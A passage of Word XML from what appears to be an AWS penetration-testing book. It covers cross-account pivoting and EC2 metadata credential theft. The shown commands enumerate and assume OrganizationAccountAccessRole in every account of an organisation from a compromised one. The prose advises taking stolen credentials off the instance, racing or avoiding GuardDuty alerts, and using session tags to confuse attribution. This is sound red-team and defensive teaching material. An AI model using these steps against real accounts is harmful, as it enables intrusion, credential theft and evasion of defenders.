          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> vendor-managed (i.e., between two customer-owned accounts) are not covered by the 2022 change at all; the customer must still write the condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EED1825" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ExternalId values that are guessable from public documentation, support tickets, or recycled across tenants are effectively not secret. A vendor who uses a per-account hash of the customer's name has defeated the purpose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C40BAC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>9.7  Resource-share footprinting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5400A33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From a compromised account, enumerate every cross-account primitive in one pass:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37827E1A"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accessanalyzer list-findings --analyzer-arn $(aws accessanalyzer list-analyzers --query 'analyzers[0].arn' --output text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242C6E5C"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findings listing every role, bucket, KMS key, function, and repo with external access ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57927AC4"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ram list-resource-shares --resource-owner SELF --query 'resourceShares[].[name,status,creationTime]'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297C85A6"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resource shares this account has outgoing ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291FFFFB"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ram list-resource-shares --resource-owner OTHER-ACCOUNTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAC0F62"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resource shares this account has incoming ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D6FC38" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>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aws organizations list-accounts --query 'Accounts[].[Id,Name,Status]' --output text 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C96AD1D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[... if current principal can read org, full member list ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7BF0ED" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>operator@kali:~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>for a in $(aws organizations list-accounts --query 'Accounts[].Id' --output text); do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD68133" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  aws sts assume-role --role-arn arn:aws:iam::$a:role/OrganizationAccountAccessRole --role-session-name recon 2&gt;&amp;1 | head -3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2757D8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C61DCE5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>9.8  VPC peering and network plane</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01643ED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Cross-account attacks sometimes succeed via the network plane with minimal IAM involvement. A VPC peering or Transit Gateway attachment allows packets to route between VPCs in different accounts. If the attacker has a foothold EC2 in one VPC and the target VPC has open security groups toward it, a direct network attack against a database or cache is available — no IAM crossing required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCABB0D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>9.9  Chained-session session tags and audit evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6576EDD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Remember the Chapter 16 preview: when you assume a role, you can pass </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:TagSession</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> values. Those tags appear in the resulting session's CloudTrail entries under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sessionContext.attributes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. A creative operator can pass attacker-chosen session tags that look like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>legitimate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>automation, diluting the defender's attribution signal. This is a gray-zone tactic — it is not an evasion per se, but it is a confusion primitive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8F29BF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>9.10  The full cross-account playbook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754159A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single-paragraph summary of the chapter: enumerate every role in every compromised account whose trust admits an external principal, every resource policy that grants external access, every RAM share incoming and outgoing, every VPC peering and TGW attachment, and every </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OrganizationAccountAccessRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> candidate. Chain through the most privileged target; treat a 60-minute chained session as a planning constraint, not a limitation. Keep session names and tags consistent enough to look like automation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671950A1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51371F28" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Role chaining is capped at a 1-hour session and is the default cross-account primitive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB3263C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OrganizationAccountAccessRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the highest-leverage cross-account pivot in AWS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CEAA6E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Resource policies on S3, KMS, Lambda, Secrets Manager, and ECR are cross-account primitives that do not require role chaining at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746D279B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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AWS RAM shares bypass IAM entirely for network-plane presence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9569DC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Confused-deputy risk persists despite the March 2022 AWS change, mostly for pre-change trusts and non-vendor cross-account relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710ADCD5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="2304" w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Part IV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C6D542" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Service-Specific Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF024D0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="part-blurb"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapters 7-9 were about IAM as a discipline: policies, roles, trusts, and the cross-account graph. Those chapters apply everywhere because every API in AWS terminates on an IAM evaluation. In Part IV we turn from the IAM plane to the data and compute planes and look at specific services. The structure of each chapter in this Part is the same: what does the service expose that an attacker can hold in hand, which IAM actions turn that service into a privilege-escalation vehicle, which actions turn it into an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>exfiltration channel, which actions turn it into a persistence mechanism, and what does the defender actually see in CloudTrail and its supporting data plane logs. The five chapters cover compute (Chapter 10), storage (Chapter 11), managed data services (Chapter 12), containers (Chapter 13), and serverless/event-driven architectures (Chapter 14). Between them they account for roughly 80% of the surface area on a typical modern AWS pentest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC0FF41" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Chapter 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>Compute: EC2, SSM, and Lambda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600D233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Compute is where instance metadata lives, where session-manager sessions originate, and where code actually runs on behalf of identities. It is therefore both the most common entry point into an AWS environment (an SSRF on an EC2-hosted app) and the most common escalation vehicle (a Lambda with a powerful execution role, an SSM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>SendCommand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> into a privileged instance). This chapter treats EC2, SSM, and Lambda together because they share one critical attacker observation: each attaches an IAM role to running code, and whoever controls the code controls the role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730D2DE7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>10.1  EC2 instance profiles and IMDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA6DBD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An EC2 instance profile is a container for a single IAM role. When an instance is launched with a profile attached, any process running on that instance can query the Instance Metadata Service (IMDS) and receive short-lived credentials bound to the role. Those credentials are ordinary STS credentials — access key id, secret access key, session token — and they work against the AWS API from anywhere on the internet until they expire. The mean expiration is six hours; the hard cap is twelve; IAM Roles Anywher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>e and longer-lived role sessions are separate systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4CE11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IMDS endpoint is the link-local address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>169.254.169.254</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on port 80. The legacy protocol (IMDSv1) answers any GET; the current protocol (IMDSv2) requires a PUT to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>/latest/api/token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> first, which returns a session token that must accompany subsequent GETs as an HTTP header. The IMDSv2 flow was introduced specifically to defeat SSRF-based credential theft because most SSRF primitives cannot set arbitrary headers or issue PUT requests. On any modern instance launched with the default AMI parameters, IMDSv2 is optional but both protocols are enabled; the instance-level </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>HttpTokens=required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> setting is what enforces IMDSv2 only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F63C6E2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="700665771"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Figure 10.1 — EC2 / SSM / Lambda attack tree. Three compute surfaces converging on the same class of artifact: short-lived credentials bound to a role the attacker did not originally hold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D1A749" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="59594743"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Web app on EC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>2</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SSRF reachabl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Engineer workstatio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ssm:StartSessio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Lambda consol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UpdateFunctionCod</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IMDSv2 token PU</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/latest/meta-data/ia</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SSM SendComman</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>d</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as instance profil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Execution-role cred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via /2018-06-01/runtim</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 credential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ASIA…, secret, token, ex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>p</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Exported from instance, used anywhere on the interne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p>
    <w:p w14:paraId="130B9DE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Once you hold IMDS-sourced credentials, the first move is not to run enumeration. It is to extract them off the instance to an operator-controlled host. The reason is operational survivability: the moment defenders notice the credentials, they can revoke the session by detaching the instance profile or invalidating the role's trust, and you want the credentials to be running on your hardware when that happens, not on an EC2 instance that the defender can terminate. Once extracted, they can be used from anyw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">here on the internet until they expire — this is the basis of the GuardDuty detection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, which fires when a given set of instance credentials is seen being used from an IP outside the AWS ranges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB5362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That detection is not a wall; it is a tripwire. The operator's options to avoid it are (a) use the credentials only from EC2 instances inside AWS (e.g., an attacker-controlled EC2 in your own account, which is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>inside AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> variant that GuardDuty flags as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>InsideAWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, a lower-severity finding), (b) use the credentials strictly from the source instance and pivot further from there, or (c) accept the finding and race the response. The third option is often rational on a time-boxed red team: the mean time to triage an EC2 credential-exfil finding in the organizations Datadog's 2023 threat report sampled was over two hours, and the goal of the operation can often be completed well under that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EA64F5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># first, confirm IMDS version on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2FE418" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1229615173"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
